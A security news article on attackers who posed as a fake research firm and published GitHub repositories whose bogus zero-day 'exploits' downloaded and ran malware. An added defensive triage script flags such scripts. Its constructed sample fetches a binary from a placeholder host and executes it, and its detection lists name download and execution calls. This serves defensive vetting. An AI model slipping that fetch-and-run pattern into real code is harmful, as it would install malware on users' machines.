CyberSecurity SEE

Attackers Create Fake Security Researchers to Steal IP

An unknown threat group recently carried out a sophisticated attack on security researchers, creating a malicious GitHub repository that claimed to contain a zero-day exploit for a vulnerability in the Signal messaging app. This attack stands out because of the significant effort the attackers put into creating a fake security company and establishing a social presence to support their deception. The research conducted by threat intelligence firm VulnCheck reveals that the group went to great lengths to build realistic personas and profiles for these fake security researchers.

What sets this campaign apart, according to William Vu, a security researcher at VulnCheck, is how much work went into making the fake company look real. “They put in a decent amount of effort into building personas, if you will, for each of these characters…So they put a lot of time and effort into building, really, a fake security company, and that, to me, is kind of new,” Vu tells Dark Reading.

Targeting security researchers is uncommon but not new. In 2021, Google’s Threat Analysis Group (TAG) found that North Korea-backed hackers had set up a fake research blog and several fake Twitter profiles to lure researchers into collaborating on vulnerability research. Those who accepted were sent a Visual Studio project file carrying custom malware that infected their systems when the project was built. In March 2023, Mandiant reported a related campaign in which North Korean actors posed as recruiters on LinkedIn to target security researchers.

The recent attack is also a social-engineering attack on the software supply chain. As Mike Parkin, a senior technical engineer at Vulcan Cyber, explains, one of the primary defenses against malicious packages is for developers to vet the source of a package before downloading and using it. If threat actors can convincingly fake the trustworthiness of the source, they have a better chance of getting victims to run their package without inspecting it.

VulnCheck took action and notified GitHub about the fake exploit repository, leading to its removal. However, the attackers quickly recreated a similar page advertising a zero-day exploit for WhatsApp. This pattern continued, with VulnCheck repeatedly notifying GitHub of the new pages, resulting in their removal, only for the attackers to create new project pages. The malicious repositories offered exploits for various software, including Microsoft Exchange and Discord.

None of the repositories contained a working exploit. Each held a Python script that, when run, detected the target’s operating system and downloaded a matching binary. Most antivirus engines detected the Windows payload, but only a handful of Linux host-based scanners flagged the Linux binary. The threat actor spread links to the fake exploit repositories through multiple social media profiles.

Vu believes the goal is access to security professionals’ research and intellectual property: by compromising researchers, the threat actors hope to obtain genuine zero-day exploits and whatever corporate IP those researchers can reach.

The attack is a reminder that companies and researchers alike need to be careful with code from unfamiliar developers. Erich Kron, a security awareness advocate at KnowBe4, stresses educating developers about the risks of code found online and how to vet both the project and the people behind it. Security researchers should apply the same diligence when examining code on open platforms such as GitHub: reading the script before running it, preferably in an isolated environment, and doing some background research on the company and individuals involved can surface red flags.
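The vetting step the article describes, taken from the two points above (read a supposed PoC before running it; a real exploit talks to its target, whereas the fake repositories' scripts only fetched and ran an OS-specific binary), can be partly automated. The script below is an added example written for this page, not code from VulnCheck or from the repositories themselves. It parses a Python "PoC" with the standard `ast` module and flags the fetch-and-run pattern: platform probing, a download call, and a call that executes or marks a file executable. Both sample scripts are constructed stand-ins; the URLs and names in them are placeholders, and the call lists are an assumption about what is worth flagging, not an exhaustive catalogue.

```python
import ast

# Constructed stand-in for the kind of "PoC" the article describes: it ignores
# its target and only fetches and runs an OS-specific binary. Not the script
# from the actual repositories; URLs are placeholders.
SUSPECT_POC = '''
import platform, urllib.request, subprocess, os, tempfile

def exploit(target):
    if platform.system() == "Windows":
        url = "http://example.invalid/poc.exe"
    else:
        url = "http://example.invalid/poc.elf"
    path = os.path.join(tempfile.gettempdir(), "poc")
    urllib.request.urlretrieve(url, path)
    os.chmod(path, 0o755)
    subprocess.Popen([path])
'''

# Constructed stand-in for an ordinary network PoC: it talks only to the
# target, so it should not be flagged as fetch-and-run.
BENIGN_POC = '''
import socket

def exploit(target, port=8080):
    payload = b"GET /" + b"A" * 4096 + b" HTTP/1.1\\r\\n\\r\\n"
    with socket.create_connection((target, port), timeout=5) as s:
        s.sendall(payload)
        return s.recv(1024)
'''

# Call names worth flagging (assumed list, extend as needed). Raw sockets are
# deliberately absent: a network exploit is expected to open connections.
DOWNLOAD = {"urllib.request.urlretrieve", "urllib.request.urlopen", "requests.get",
            "requests.post", "http.client.HTTPConnection", "http.client.HTTPSConnection"}
EXECUTE = {"subprocess.Popen", "subprocess.run", "subprocess.call", "subprocess.check_call",
           "subprocess.check_output", "os.system", "os.popen", "os.execv", "os.execve",
           "os.startfile", "os.chmod", "ctypes.CDLL", "exec", "eval"}
PLATFORM = {"platform.system", "platform.machine", "os.uname", "sys.platform", "os.name"}
DECODE = {"base64.b64decode", "base64.b85decode", "zlib.decompress", "marshal.loads"}


def import_aliases(tree):
    """Map local names to the dotted name they were imported as, so that
    `import subprocess as sp` or `from os import system` cannot hide a call."""
    aliases = {}
    for node in ast.walk(tree):
        if isinstance(node, ast.Import):
            for a in node.names:
                if a.asname:
                    aliases[a.asname] = a.name
        elif isinstance(node, ast.ImportFrom) and node.module and node.level == 0:
            for a in node.names:
                aliases[a.asname or a.name] = f"{node.module}.{a.name}"
    return aliases


def canonical(node, aliases):
    """Render a Name/Attribute chain as `a.b.c`, resolving the leading alias.
    Returns None for anything that is not a plain chain (e.g. f().g)."""
    parts = []
    while isinstance(node, ast.Attribute):
        parts.append(node.attr)
        node = node.value
    if not isinstance(node, ast.Name):
        return None
    parts.append(aliases.get(node.id, node.id))
    return ".".join(reversed(parts))


def triage(source):
    """Return {category: sorted line numbers} of risky constructs in a PoC script."""
    tree = ast.parse(source)
    aliases = import_aliases(tree)
    hits = {"download": set(), "execute": set(), "platform": set(), "decode": set()}
    for node in ast.walk(tree):
        if isinstance(node, ast.Call):
            name = canonical(node.func, aliases)
            for cat, names in (("download", DOWNLOAD), ("execute", EXECUTE),
                               ("platform", PLATFORM), ("decode", DECODE)):
                if name in names:
                    hits[cat].add(node.lineno)
        elif isinstance(node, ast.Attribute):
            # Bare attribute reads such as sys.platform or os.name are not calls.
            if canonical(node, aliases) in PLATFORM:
                hits["platform"].add(node.lineno)
    return {k: sorted(v) for k, v in hits.items()}


def verdict(hits):
    """Fetch-and-run (download plus execute) is the pattern the fake repos used."""
    if hits["download"] and hits["execute"]:
        return "download-and-execute"
    if hits["execute"] or hits["decode"]:
        return "needs manual review"
    return "no fetch/exec behaviour found"


if __name__ == "__main__":
    for label, src in (("suspect", SUSPECT_POC), ("benign", BENIGN_POC)):
        h = triage(src)
        print(f"{label}: {verdict(h)} {h}")
```

A static check like this is a first filter, not a clearance: it will miss payloads built from string concatenation, `__import__`, or a second-stage file, which is why it reports "needs manual review" for anything that executes or decodes. The alias resolution matters because `import subprocess as sp` is the first thing a malicious author tries against naive grep-based review.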

The campaign underlines the need for awareness and vigilance, though researchers with an established track record are better placed to spot suspicious approaches. Newer researchers, who have yet to build that history and network in the industry, have more reason to be cautious. Treating unfamiliar code and contacts with healthy suspicion, and investigating before engaging, lets both companies and researchers limit the risk from attacks like this one.
